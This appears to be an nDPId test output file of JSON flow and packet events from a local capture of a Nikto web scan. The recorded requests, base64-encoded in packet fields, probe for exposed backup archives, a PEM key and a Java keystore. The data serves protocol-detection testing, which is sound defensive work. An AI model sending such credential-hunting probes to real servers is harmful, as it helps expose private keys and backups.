-00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1576420276936,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420276936,"pkt":"AAAAAAAAAAAAAAAACABFAADKdTNAAEAGxvh\/AAABfwAAAcLeH5C4Uk1kAkvbMoAYAED+vgAAAQEICp1m+++dZvvvR0VUIC8xMjcuMC4wLjEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276936,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276937,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1576420276937,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420276937,"pkt":"AAAAAAAAAAAAAAAACABFAADK9XZAAEAGRrV\/AAABfwAAAcLgH5B7eM0nuPdDlYAYAED+vgAAAQEICp1m+\/GdZvvxR0VUIC8xMjcuMC4wLjEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276937,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276938,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1576420276938,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276938,"pkt":"AAAAAAAAAAAAAAAACABFAADFaYFAAEAG0q9\/AAABfwAAAcLiH5DjU1EuPo0KHoAYAED+uQAAAQEICp1m+\/KdZvvyR0VUIC8xMjcuMC4wLjEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276938,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276939,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1576420276939,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276939,"pkt":"AAAAAAAAAAAAAAAACABFAADFJ3BAAEAGFMF\/AAABfwAAAcLkH5B8NB8+Bh651YAYAED+uQAAAQEICp1m+\/OdZvvzR0VUIC8xMjcuMC4wLjEuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276939,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276941,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1576420276941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276941,"pkt":"AAAAAAAAAAAAAAAACABFAADCOKZAAEAGA45\/AAABfwAAAcLmH5ActAD4h3K22IAYAED+tgAAAQEICp1m+\/WdZvv1R0VUIC9iYWNrdXAucGVtIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276941,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276943,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1576420276943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276943,"pkt":"AAAAAAAAAAAAAAAACABFAADCuRhAAEAGgxt\/AAABfwAAAcLoH5DBbYFGICWC9IAYAED+tgAAAQEICp1m+\/edZvv3R0VUIC9iYWNrdXAucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276943,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276945,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1576420276945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276945,"pkt":"AAAAAAAAAAAAAAAACABFAAC9GW5AAEAGIst\/AAABfwAAAcLqH5C0ISE5HkW76YAYAED+sQAAAQEICp1m+\/mdZvv5R0VUIC8xLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276945,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276947,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1576420276947,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276947,"pkt":"AAAAAAAAAAAAAAAACABFAAC9hilAAEAGtg9\/AAABfwAAAcLsH5DmS75z\/EZQIIAYAED+sQAAAQEICp1m+\/udZvv7R0VUIC8xLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276947,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276949,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1576420276949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276949,"pkt":"AAAAAAAAAAAAAAAACABFAADG8sFAAEAGSW5\/AAABfwAAAcLuH5DZeMrrTWBmVIAYAED+ugAAAQEICp1m+\/2dZvv9R0VUIC8xMjcwMC50YXIubHptYSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276949,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276950,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1576420276950,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276950,"pkt":"AAAAAAAAAAAAAAAACABFAADGIHlAAEAGG7d\/AAABfwAAAcLwH5AJERgjseiOe4AYAED+ugAAAQEICp1m+\/6dZvv+R0VUIC8xMjcwMC50YXIubHptYSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276950,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276953,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1576420276953,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276953,"pkt":"AAAAAAAAAAAAAAAACABFAADB609AAEAGUOV\/AAABfwAAAcLyH5CMSNMc4cqoooAYAED+tQAAAQEICp1m\/AGdZvwBR0VUIC8xMjcwMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} 
-01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276953,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 